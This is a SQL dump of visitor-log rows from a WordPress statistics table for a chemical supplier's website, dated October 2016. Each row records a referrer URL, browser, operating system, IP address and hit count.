INSERT INTO `wp_statistics_visitor` VALUES (4564, '2016-10-16', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '72.187.163.203', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4565, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.164.52.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4566, '2016-10-16', 'https://mmr.mschem.com/', 'Opera', 'Windows', '12.16', '', '119.128.175.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4567, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '600.1.4', '', '69.77.249.103', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4568, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.64', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4569, '2016-10-16', 'https://www.google.com/', 'Opera Next', 'Linux', '37.0.2192.105088', '', '71.74.70.79', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4570, '2016-10-16', 'https://www.adsensecustomsearchads.com/afs/ads?q=epoxy%20concrete%20coating%20terra%20cotta&adpage=1&ccfn=amazon_detail_numbered_narrow_15px_title&r=m&fexp=21404%2C7000107&client=amazon&channel=g-channel-79%2Bg-channel-223%2Bg-channel-346&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&jsei=3&format=n4&ad=n4&nocache=2221476586274249&num=0&output=uds_ads_only&v=3&bsl=10&u_his=1&u_tz=-420&dt=1476586274249&u_w=1219&u_h=975&biw=-12245933&bih=-12245933&isw=1172&ish=1&psw=1172&psh=0&frm=2&uio=uv3-&jsv=10306&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com', 'Edge', 'Windows', '14.14393', '', '73.170.170.121', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4571, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '190.82.16.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4572, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.247.22.224', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4573, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.247.22.223', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4574, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '28.0.1500.95', '', '52.90.31.222', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4575, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.158.108.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4576, '2016-10-16', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '24.140.171.95', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4577, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '69.59.67.120', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4578, '2016-10-16', 'https://www.miller-stephenson.com', 'SafeDNSBot', 'Unknown', 'Unknown', '', '146.185.178.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4579, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4580, '2016-10-16', 'https://vremya.eu/stati/zdorove-i-medicina/kosmetologicheskii-centr-yeterija-odessa.html', 'MSIE', 'Windows', '6.0', '', '37.115.187.108', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4581, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '70.210.129.165', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4582, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'Unknown', '602.1', '', '70.210.129.165', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4583, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.169.203.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4584, '2016-10-16', 'https://vadimkravtcov.ru/', 'MSIE', 'Windows', '6.0', '', '46.118.118.216', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4585, '2016-10-16', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '166.137.246.81', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4586, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4587, '2016-10-16', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.112.23', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4588, '2016-10-16', 'https://www.bing.com/search?q=EPIKURE+3234&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4589, '2016-10-16', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epikure-curing-agents/epikure-200-series-aliphatic-amines/', 'MSIE', 'Windows', '9.0', '', '204.79.180.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4590, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '4.0b7', '', '46.229.167.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4591, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '4.0b9pre', '', '46.229.167.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4592, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '146.158.7.163', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4593, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '202.212.14.43', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4594, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '9.0', '', '24.77.223.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4595, '2016-10-16', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwi8y6bi197PAhVDzVQKHRXnDzQQFgg6MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-477c%2F&usg=AFQjCNFLyqKMKZiyGfxLX9EDgIObI7EPcg', 'MSIE', 'Windows', '11.0', '', '14.53.198.237', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4596, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.41.38.132', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4597, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.190.58.142', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4598, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4599, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '110.138.46.47', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4600, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.12.33.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4601, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.147.193.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4602, '2016-10-16', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '84.50.221.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4603, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.108.79.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4604, '2016-10-16', 'https://www.directindustry.de/prod/miller-stephenson-chemical-co/product-173822-1749327.html', 'Safari', 'Macintosh', '6.1.6', '', '80.101.78.23', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4605, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '195.146.37.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4606, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '10.0.648.204', '', '74.85.214.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4607, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4608, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.198.223.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4609, '2016-10-16', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.7.0', '', '64.145.76.135', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4610, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '10.0.3', '', '64.145.76.135', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4611, '2016-10-16', 'https://rc.runryder.com/helicopter/t773523p1/', 'Firefox', 'Windows', '49.0', '', '67.82.223.233', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4612, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.150.47.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4613, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.234.59.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4614, '2016-10-16', 'https://ibb.com.ua/', 'MSIE', 'Windows', '6.0', '', '46.118.155.22', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4615, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.3.207.233', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4616, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4617, '2016-10-16', 'https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/', 'MSIE', 'Windows', '9.0', '', '204.79.180.180', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4618, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '148.251.200.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4619, '2016-10-16', 'https://www.google.com.bd/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.0.0.29', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4620, '2016-10-16', 'https://www.miller-stephenson.com/', 'Firefox', 'Macintosh', '34.0', '', '104.250.226.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4621, '2016-10-16', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '23.250.89.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4622, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.44.224.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4623, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.70.23.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4624, '2016-10-16', 'https://www.google.com/aclk?sa=L&ai=DChcSEwio8uHH9d7PAhWFXn4KHQd7ChEYABAA&sig=AOD64_1PJTzZs4dPXWcRc7KpHohrTE9YQg&rct=j&q=&ved=0ahUKEwispd_H9d7PAhULx2MKHeTYCU4Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '130.76.96.144', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4625, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '54.81.112.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4626, '2016-10-16', 'https://www.miller-stephenson.com', 'Go', 'Unknown', 'Unknown', '', '54.81.112.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4627, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.200.78.49', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4628, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '32.0.1700.76', '', '54.198.173.183', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4629, '2016-10-16', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/', 'MSIE', 'Windows', '11.0', '', '94.57.52.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4630, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4631, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.237.9.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4632, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.57.30.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4633, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.74.68.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4634, '2016-10-16', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.7.0', '', '153.142.222.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4635, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.126.169.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4636, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.147.238.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4637, '2016-10-16', 'https://www.google.ru/', 'Chrome', 'Windows', '52.0.2743.116', '', '89.23.196.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4638, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '41.0.2272.96', '', '66.249.79.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4639, '2016-10-16', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '2.191.43.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4640, '2016-10-16', 'https://www.google.sk/', 'Chrome', 'Windows', '53.0.2785.143', '', '95.105.151.173', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4641, '2016-10-16', 'https://www.google.ca/', 'Safari', 'Macintosh', '10.0', '', '24.224.143.211', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4642, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.244.138.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4643, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.215.112.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4644, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '48.0', '', '84.192.255.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4645, '2016-10-16', 'https://www.ptonline.com/suppliers/millste', 'Chrome', 'Windows', '53.0.2785.143', '', '41.41.112.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4646, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.101.100.189', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4647, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.31.162.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4648, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.44', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4649, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4650, '2016-10-16', 'https://ttsgco.blogfa.com/', 'Firefox', 'Windows', '49.0', '', '78.158.180.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4651, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.79.188.43', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4652, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '15.0.1', '', '184.173.144.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4653, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '93.159.230.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4654, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.181', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4655, '2016-10-16', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4656, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.69.245.142', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4657, '2016-10-16', 'https://xn--80aaafbn2bc2ahdfrfkln6l.xn--p1ai/', 'Unknown', 'Unknown', 'Unknown', '', '46.118.118.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4658, '2016-10-16', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'MSIE', 'Windows', '10.0', '', '199.89.130.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4659, '2016-10-16', 'https://www.miller-stephenson.com/product/epon-828/', 'MSIE', 'Windows', '11.0', '', '131.137.245.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4660, '2016-10-16', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '66.87.114.101', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4661, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.69', '', '121.189.37.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4662, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.91.77', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4663, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.186.216.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4664, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.254.68.126', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4665, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.146.63.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4666, '2016-10-16', 'https://www.google.cat/url?sa=t&rct=j&q=2146%20resin&source=web&cd=5&ved=0ahUKEwjzlrqUpt_PAhVGuRQKHfqWALYQFgg2MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct-tag%2F2146%2F&usg=AFQjCNFhWAhKHQNeQqlppdLYRm8GjDC_1A', 'Firefox', 'Windows', '49.0', '', '83.60.37.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4667, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '18.0.1025.45', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4668, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.222.103.8', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4669, '2016-10-16', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '69.164.211.97', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4670, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '145.255.176.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4671, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4672, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4673, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4674, '2016-10-16', 'https://www.google.com.mt/', 'Chrome', 'Windows', '54.0.2840.59', '', '92.251.77.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4675, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '107.3.95.149', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4676, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '150.70.173.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4677, '2016-10-16', 'https://www.google.com/aclk?sa=L&ai=DChcSEwifz8zisd_PAhWCaX4KHbpdDNsYABAA&ei=DHsDWPr4FoiWmwGOtY2oCA&sig=AOD64_1SPGyfOmN1JFcMWO6VrRYRVlZ7UQ&rct=j&frm=1&q=&sqi=2&ved=0ahUKEwj6rsbisd_PAhUIyyYKHY5aA4UQ0QwIGg&adurl=', 'MSIE', 'Windows', '10.0', '', '73.27.7.213', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4678, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.24.126.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4679, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.205.101.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4680, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '10.195.153.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4681, '2016-10-16', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.3', '', '190.163.27.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4682, '2016-10-16', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '72.92.43.103', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4683, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.75', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4684, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.161', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4685, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.68.24.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4686, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.180.50.72', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4687, '2016-10-16', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '32.0.1700.107', '', '2.27.210.158', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4688, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '180.174.217.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4689, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.147.27.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4690, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.9.108.198', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4691, '2016-10-16', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.86.222.7', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4692, '2016-10-16', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '74.218.202.206', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4693, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4694, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.29.11.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4695, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4696, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '202.46.58.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4697, '2016-10-16', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '68.197.159.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4698, '2016-10-16', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '66.190.152.54', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4699, '2016-10-16', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=51', 'MSIE', 'Windows', '9.0', '', '182.118.25.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4700, '2016-10-16', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Windows', '534', '', '131.253.25.245', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4701, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.243.8.215', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4702, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4703, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '172.88.146.69', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4704, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '184.58.131.185', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4705, '2016-10-16', 'https://www.google.ca/', 'Safari', 'iPhone', '9.0', '', '103.7.77.0', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4706, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4707, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4708, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.46.153.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4709, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.133.114.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4710, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.113.108.234', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4711, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '222.220.145.177', '000', 1, 0); 
